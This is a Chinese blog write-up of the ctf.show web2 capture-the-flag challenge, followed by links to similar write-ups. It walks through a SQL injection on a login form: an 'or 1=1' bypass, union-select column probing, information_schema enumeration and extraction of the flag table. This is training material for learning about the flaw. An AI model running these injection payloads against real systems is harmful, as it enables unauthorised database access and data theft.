CTF_show_web2

最新推荐文章于 2024-10-18 19:12:03 发布
最新推荐文章于 2024-10-18 19:12:03 发布
阅读量422 收藏 1
点赞数 13
分类专栏: ctf刷题 文章标签: sql 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56155558/article/details/137006055
版权

从题目上的提示看 这是sql注入

题目是这样的

先用单引号闭合看一下效果                 

1' or 1=1 #

返回这样的显示 

那么接下来进行常规的注入语句

用order by 语句 探测字段数 一直也探测不出来 那就换个思路 直接查询字段数

1' union select 1,2,3  #

用这个语句 探测到3 的 时候 回头显示了一个2  那么回显点就在第二个字段上 那么接下来就好操作了  直接替换2字段在上面做操作

查询表名:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- 

查到了两个表

先在flag这个表里入手

查询字段名:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()   and table_name='flag' -- 

在flag表里面 查到了一个叫flag的字段

那么字段里面肯定就是flag个了

用下面语句 

查询flag字段 在flag表里面

1' union select 1,flag,3 from flag #

得到flag如下:

欢迎你,ctfshow{45bfd2b4-e0e1-4d12-8c01-ac3b568d40fc}

XXSec.
关注
专栏目录
ctfshow-WEB-web2
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 1953
自用
ctf.show_web2
小支柱的博客
05-11 457
ctfshow靶场ctf.show_web2解题思路
ROSE笔记-ctf.show_web2-WP
居上
11-05 232
ctf.show_web2-WP 直接是一个登录界面,在用户名处输入万能密码 admin' or 1=1 # 显示了登陆信息,现在就是去找回显位置。用order by判断当前查询的列数,order by 4的时候登陆信息消失,而order by 3的时候存在登陆信息。至此,判断回显位置 admin' or 1=1 union select 1,2,3# 看到“2”的位置为回显位,接着开始查询依次查询数据库名,表名以及字段 #查询到当前数据库名为web2 admin' or 1=1 union se
ctf_show_web6
Nothing-one的博客
11-22 3171
打开题目后我们可以看到这个 这里我们用bp工具进行
ctf_show_web4
Nothing-one的博客
11-19 2475
这一道题他们给的提示是
ctf_show笔记篇(web入门---信息收集)
whale_waves的博客
03-02 681
php探针是用php语言编写的一个程序,可以用来查看服务器的状态,比如服务器操作系统信息,服务器CPU、内存和硬盘的使用状况,php版本和组件信息,数据库版本信息,实时网速等。可以非常方便地了解服务器的运行状态雅黑php探针:url/tz.php可将这些写入目录扫描使用的字典里,可以跟方便的扫东西。
ctf.show_web2解题过程
qq_38634097的博客
05-24 570
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
mysql 南邮ctf_南邮CTF平台WEB题writeup
weixin_39596739的博客
02-07 2618
https://cgctf.nuptsast.com/login1.签到题F12查看网页源代码就有flag2.md5 collision附上题目给的源代码md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) {echo ...
CTF show web4
qq_43039823的博客
07-22 928
这个题长得跟web3很相似,但是实际上内容不同,得到flag的姿势也是各不相同。 打开题目界面,依旧是老样子,上边光秃秃的就一句include ....结合上题目的知识很清晰的判断出是文件包含漏洞。“PHP:include(), include_once(), require(), require_once()等 老姿势 , url=/etc/passwd 依旧能读出用户的属性,文件包含确认! 尝试着跟上一个题目的思路一样,打开burp 加上一句<?php system("ls")?&g...
2024年ctfshow-WEB-web2_ctf
2401_84252281的博客
05-01 273
首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输接下来获取flag表的字段接下来获取flag表的数据。
ctf.show web 8 sql注入过滤了‘
m0_46412682的博客
07-14 990
ctf.show web 8 sql注入过滤了’ 开始的页面 提示是sql注入,第一步先试下 ’ or 1=1# 提示sql注入错误 第二步试下/**/替代空格,还是错误 第三步,去掉’单引号,成功,说明过滤了单引号 查看有多少字段,1/**/or/**/1=1/**/union/**/select/**/1,2,3#,但是这里又提示sql错误,这里可能过滤了select和union关键字 上脚本,这的脚本是网上找的 import requests s=requests.session() url='h
SQL调优指南及高级SQL技巧
Hellc007的博客
10-14 1033
SQL调优是一个复杂的任务,需要对数据库结构、索引设计、查询逻辑、事务管理等多个方面的深入理解。通过运用上述高级技巧和应对实战问题的策略,可以有效提高SQL查询的性能,优化数据库的整体表现。希望这篇文章能为你的添彩。
union all SQL 操作符
2301_77836489的博客
10-15 430
union all SQL 操作符
mysql学习教程,从入门到精通,SQL 约束(Constraints)(41)
qq_45746668的博客
10-12 1025
数据库设计中,约束(Constraints)用于确保数据的准确性和完整性。它们通过限制可以插入到数据库表中的数据类型来防止无效数据。SQL 中有几种常见的约束类型,包括主键约束(Primary Key)、外键约束(Foreign Key)、唯一约束(Unique)、非空约束(NOT NULL)和检查约束(CHECK)。
Flink PostgreSQL CDC源码解读:深入理解数据流同步
最新发布
击水三千里的专栏
10-18 96
PostgreSQL通过Replication Slot和Logical Decoding实现CDC,捕获数据变更并通过Debezium等工具发送到消息队列。WAL日志记录数据库操作,而Debezium支持多种部署方式,如Kafka Connect和嵌入式引擎,以实现数据流同步。Flink通过配置postgres-cdc连接器,利用Debezium获取PostgreSQL的变更数据。
sql server删除过期备份文件脚本
Winter_Sun灬的博客
10-14 423
删除sql server数据库备份文件脚本
mysql学习教程,从入门到精通,SQL常用函数(40)
qq_45746668的博客
10-11 825
SQL(Structured Query Language)是一种用于管理和操作关系数据库的编程语言。SQL提供了许多内置函数,这些函数可以对数据库中的数据进行各种计算和操作。
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值